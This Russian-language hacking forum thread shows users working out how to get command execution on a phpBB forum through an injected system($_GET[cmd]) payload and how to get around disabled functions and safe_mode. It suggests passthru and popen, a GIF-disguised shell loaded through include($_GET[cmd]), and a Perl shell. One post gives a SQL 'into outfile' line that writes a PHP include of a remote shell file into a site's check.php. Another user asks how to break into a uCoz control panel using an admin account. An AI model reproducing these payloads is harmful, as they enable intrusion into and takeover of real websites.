laedafess Не канает Подредактировал скрипт чуть (так как ты не правильно написал чуток) При заходе на страницу (без GET запроса) Пишет: Warning: shell_exec() has been disabled for security reasons in /www/****/**.ru/html/forum/includes/usercp_register.php(895) : regexp code on line 1 Warning: system() has been disabled for security reasons in /www/****/**.ru/html/forum/includes/usercp_register.php(895) : regexp code on line 1 А если переходить вместе с GETом то идет редирект на главную страницу форума
У меня похожая ситуация, при подстановке system($_GET[cmd]) ничего не выходит, хотя функции включены...
в общем там сейф мод=он попробуй другие функции, например passthru.(хотя скорее всего тоже не пройдет) ищи способы обхода сейф мода(в гугл с запросом safe_mode bypass ) хотя, имхо, тебе еще рано.
Я знаю акк админа на одном сайте созданым на юкоз,можно ли с помощью его както взломать панель управления?
geezer.code, нет, там как бэ не сейф мод, если бы был сейф мод - пшп ругался бы на то что включен сейф мод, а пшп ругается что отключены функции Warning: shell_exec() has been disabled for security reasons Вообще тут надо пробовать другие системные функции, типа popen или passthru а вообще лучше залить гифку с полноценным шеллом, вместо 'phpbb:system($_GET[cmd])' вставить ='phpbb:include($_GET[cmd])' и его проинклудить. А там уже можно посмотреть какие функции отключены и если отключены все функции позволяющие выполнять команды, пробовать залить перловый шелл с штацессом вот, удачке в хэке =)
Qwazar, я про удалённый инклуд и не говорил) так как он в админке пшпбб, то там наверника есть способ залить картинку
Ничем не лучше, для того, чтобы это работало, должна быть включена функция shell_exec, а она не пашет при сейф моде. В отличии от eval. P.S. И работает она не как passthru(), а как shell_exec().
Заранее извиняюсь,что не прочитал всю тему,но нельзя ли выполнить phpinfo() для просмотра safe_mode = On Если РНР запущен в виде CGI модуля, то safe mode полюбому отсутствует.Также при юзании include,fopen(),file() и других функций safe mode даст о себе знать.Можно попробовать позапускать сценарии в различных каталогах(функциями system(),exec(),popen(),если они работают). Опять же будет попытка ругани со стороны сервера на то,что ты откроешь чужой фаил.Значит,опять сейф мод стоит.То бишь сразу будет ясно,что стоит директива safe_mode_exec_dir.Ещё можно попробовать создавать файлы с помощью php функций в других каталогах.Если будет ругаться - опять safe mode.Вообще,при safe mode,будут введены ограничения на следующие функции: chgrp include require chmod link rmdir chown passthru symlink exec popen system fopen readfile unlink file rename Если со всеми ними будет неладно,то 100% стоит safe mode.Пробуй)
Code: select '<? include("http://bestquest.info/shell.txt") ?>' into outfile 'C:/Program Files/VertrigoServ/www/engine/inc/check.php'
А с каких пор при локальном инклуде можно прочитать любой файл на серве? При инклуде можно проинклудить файл, выполнив в нём код, а не прочитать, это далеко не одно и тоже. Не надо путать людей, а то что можно просмотреть содержимое файлов без пхп кода - это не равносильно читалке файлов.
